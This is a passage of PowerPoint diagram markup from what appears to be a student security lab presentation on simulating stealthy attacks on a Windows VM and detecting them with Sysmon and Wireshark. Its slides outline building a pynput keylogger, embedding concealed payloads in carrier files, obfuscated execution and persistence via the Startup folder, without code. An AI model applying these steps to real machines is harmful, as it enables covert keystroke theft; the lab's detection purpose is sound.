              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Mutlu </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="676779"/>
        <a:ext cx="10363200" cy="676366"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AD1341A0-FEB4-4FA1-BF6B-193633168E36}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1353145"/>
          <a:ext cx="1036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1C149-19EB-4A22-9941-0B8B32329B23}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1353145"/>
          <a:ext cx="10363200" cy="67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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>• </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Andranik Voskanyan</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1353145"/>
        <a:ext cx="10363200" cy="676366"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{59B958C8-AC82-4805-9ACE-1BC0B896823E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2029512"/>
          <a:ext cx="1036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FBD6E-AD8F-4D49-A55B-7C9B80E0D0BF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2029512"/>
          <a:ext cx="10363200" cy="67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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>• </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Cédric</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Sipakam</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2029512"/>
        <a:ext cx="10363200" cy="676366"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2585B94E-23A8-4EBE-B010-450928F8297E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2705878"/>
          <a:ext cx="1036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B76B7-7B5E-42F7-AF25-5A8841A2B756}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2705878"/>
          <a:ext cx="10363200" cy="67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>
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Get the code:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>  github.com/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200" err="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>ibeatricez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3100" kern="1200" err="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>oss_project</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2705878"/>
        <a:ext cx="10363200" cy="676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2B368-EB0D-47EC-8C76-07AC43095B0C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="412"/>
          <a:ext cx="10363200" cy="9662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335FB-1D1F-46C4-AEB5-E9A635A84783}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="292286" y="217816"/>
          <a:ext cx="531430" cy="5314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7DEDF-4741-44A3-BB3D-DD527B3E8660}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1116004" y="412"/>
          <a:ext cx="9247195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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Ensuring the security of a computer system is a critical task. It involves maintaining the confidentiality, integrity, and availability of the operating system and its resources.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1116004" y="412"/>
        <a:ext cx="9247195" cy="966237"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A0C7FDB3-9FDE-4107-83CF-EE564EBC50C9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1208210"/>
          <a:ext cx="10363200" cy="9662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F583D-8A3C-4ECF-9596-E412F1327C5A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="292286" y="1425613"/>
          <a:ext cx="531430" cy="5314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8CB09-003F-4F99-A4FF-ACACDB352487}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1116004" y="1208210"/>
          <a:ext cx="9247195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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>Security not only demands an adequate internal protection mechanism but also requires careful consideration of the external environment in which the system operates.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="49000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:latin typeface="Grandview Display"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1116004" y="1208210"/>
        <a:ext cx="9247195" cy="966237"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{696741E3-C230-4903-B530-EE92ACB427DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2416007"/>
          <a:ext cx="10363200" cy="9662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93097-A63B-4966-8901-56987294A6E5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="292286" y="2633410"/>
          <a:ext cx="531430" cy="5314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BB9CF-5C14-47D2-BE1E-354C94488713}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1116004" y="2416007"/>
          <a:ext cx="9247195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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="49000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t>A computer system is considered secure when its resources are accessed and utilized as intended, under all circumstances which is including stealth attacks. </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1116004" y="2416007"/>
        <a:ext cx="9247195" cy="9662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2A5D5-14C2-43B2-8410-8D99CE20F2ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="33015"/>
          <a:ext cx="9549098" cy="6762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We simulate stealthy techniques using custom tools and scripts that mirror real-world attacker behaviour:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33012" y="66027"/>
        <a:ext cx="9483074" cy="610236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{98F0B26A-2966-46D4-B25B-9FA247045BCC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="758235"/>
          <a:ext cx="9549098" cy="6762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Keystroke logging</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t> using Python-based keyloggers (keylog.py, activity_logger.py)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33012" y="791247"/>
        <a:ext cx="9483074" cy="610236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F99561F1-49AF-4554-B5F5-3FE31C7CD931}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1483455"/>
          <a:ext cx="9549098" cy="6762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Stealthy command execution</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t> via .bat scripts (cmd_commands.bat) and precompiled executables</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33012" y="1516467"/>
        <a:ext cx="9483074" cy="610236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D382FCAD-69DB-4EE5-B519-6F48883D1284}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2208675"/>
          <a:ext cx="9549098" cy="6762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Payload delivery &amp; execution</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t> using .exe binaries and obfuscated commands</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33012" y="2241687"/>
        <a:ext cx="9483074" cy="610236"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8929226F-957D-4997-BC73-5037F5A30620}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2933895"/>
          <a:ext cx="9549098" cy="6762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Command lists</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t> structured and tested through cmd_commands.txt for controlled execution scenarios</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="33012" y="2966907"/>
        <a:ext cx="9483074" cy="610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DEB21-0160-4DD5-ACEB-2C30699C96B9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2022"/>
          <a:ext cx="6172199" cy="10251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477F2-DB66-4CAC-B121-1065E106698D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="310115" y="232687"/>
          <a:ext cx="563846" cy="5638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6AD78-55E8-4B6E-B57B-029A79973393}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1184076" y="2022"/>
          <a:ext cx="498812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Process Monitoring</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200"/>
            <a:t> (Sysmon Event ID 1, Windows 4688)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1184076" y="2022"/>
        <a:ext cx="4988123" cy="1025174"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B6EF7419-B15C-44E2-8F87-460CFCCF1016}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1283491"/>
          <a:ext cx="6172199" cy="10251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45BA1-1E08-4D82-B86A-85D1BA50C6DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="310115" y="1514155"/>
          <a:ext cx="563846" cy="5638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296E6-E00C-4DCF-9146-26F9A73B5BBF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1184076" y="1283491"/>
          <a:ext cx="498812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File Writes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200"/>
            <a:t> (Sysmon 11 – keylogger, startup batch)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1184076" y="1283491"/>
        <a:ext cx="4988123" cy="1025174"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8FAB0DE5-281E-4722-B50C-5D68152EBC8B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2564959"/>
          <a:ext cx="6172199" cy="10251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12A3C-6367-482C-99C2-9F844DA3BA3F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="310115" y="2795623"/>
          <a:ext cx="563846" cy="5638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94310-0E06-4BFD-9385-ED9A2E609938}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1184076" y="2564959"/>
          <a:ext cx="498812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Network Traffic</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200"/>
            <a:t> (Sysmon 3, Wireshark traces)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1184076" y="2564959"/>
        <a:ext cx="4988123" cy="1025174"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C73F2399-6EE1-4167-825D-43FDFB6E702A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3846427"/>
          <a:ext cx="6172199" cy="10251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F0C03-8459-4FF6-90D7-3116486AE075}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="310115" y="4077091"/>
          <a:ext cx="563846" cy="563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200E5-11D0-405F-9C51-8DD619B9DCC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1184076" y="3846427"/>
          <a:ext cx="498812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CPU/RAM Usage</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200"/>
            <a:t> (Task Manager</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200">
              <a:latin typeface="Grandview Display"/>
            </a:rPr>
            <a:t> /process monitor </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="2000" kern="1200"/>
            <a:t>+ Defender/Bitdefender agents)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1184076" y="3846427"/>
        <a:ext cx="4988123" cy="10251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36850-DBAC-4B94-BEB0-4F2942919D1D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1887600" y="14683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7C1B2-083C-4211-8E6E-BAE42BD95EC8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="483600" y="179166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b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Generate / Embed</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="483600" y="1791661"/>
        <a:ext cx="4320000" cy="648000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0530AC03-97A1-40A4-BB60-95F79788777B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="483600" y="2501441"/>
          <a:ext cx="4320000" cy="734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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Craft a carrier file (e.g., PDF, image, batch) and embed a concealed command or payload.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="483600" y="2501441"/>
        <a:ext cx="4320000" cy="734381"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EF99FE8E-21C7-42BF-8276-BB0521F72E57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6963600" y="14683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D1023-5CC9-4624-9CAA-AB1488EB5C0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5559600" y="179166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b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Download &amp; Execute</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3600" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5559600" y="1791661"/>
        <a:ext cx="4320000" cy="648000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{31393828-4A94-4D56-90FD-4D3FA6969BD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5559600" y="2501441"/>
          <a:ext cx="4320000" cy="734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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Transfer the file to a Windows VM and trigger execution (double-click, macro, or script).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5559600" y="2501441"/>
        <a:ext cx="4320000" cy="7343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36850-DBAC-4B94-BEB0-4F2942919D1D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1006935" y="310062"/>
          <a:ext cx="1082320" cy="1082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7C1B2-083C-4211-8E6E-BAE42BD95EC8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1924" y="1511171"/>
          <a:ext cx="3092343" cy="46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000" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Build the Payload</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3000" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1924" y="1511171"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0530AC03-97A1-40A4-BB60-95F79788777B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1924" y="2030274"/>
          <a:ext cx="3092343" cy="104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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Use keylog.py ( </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200" err="1">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>pynput</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>-based ) → logs keystrokes to key.txt.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1924" y="2030274"/>
        <a:ext cx="3092343" cy="1042321"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EF99FE8E-21C7-42BF-8276-BB0521F72E57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4640439" y="310062"/>
          <a:ext cx="1082320" cy="10823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D1023-5CC9-4624-9CAA-AB1488EB5C0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3635428" y="1511171"/>
          <a:ext cx="3092343" cy="46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000" kern="1200">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Stage on Target</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3000" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3635428" y="1511171"/>
        <a:ext cx="3092343" cy="463851"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{31393828-4A94-4D56-90FD-4D3FA6969BD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3635428" y="2030274"/>
          <a:ext cx="3092343" cy="104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solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="76000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Copy keylog.py into the user’s Startup folder.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="76000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3635428" y="2030274"/>
        <a:ext cx="3092343" cy="1042321"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5F7A57D2-DE20-4FCB-B9B3-97B3911F0941}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8273943" y="310062"/>
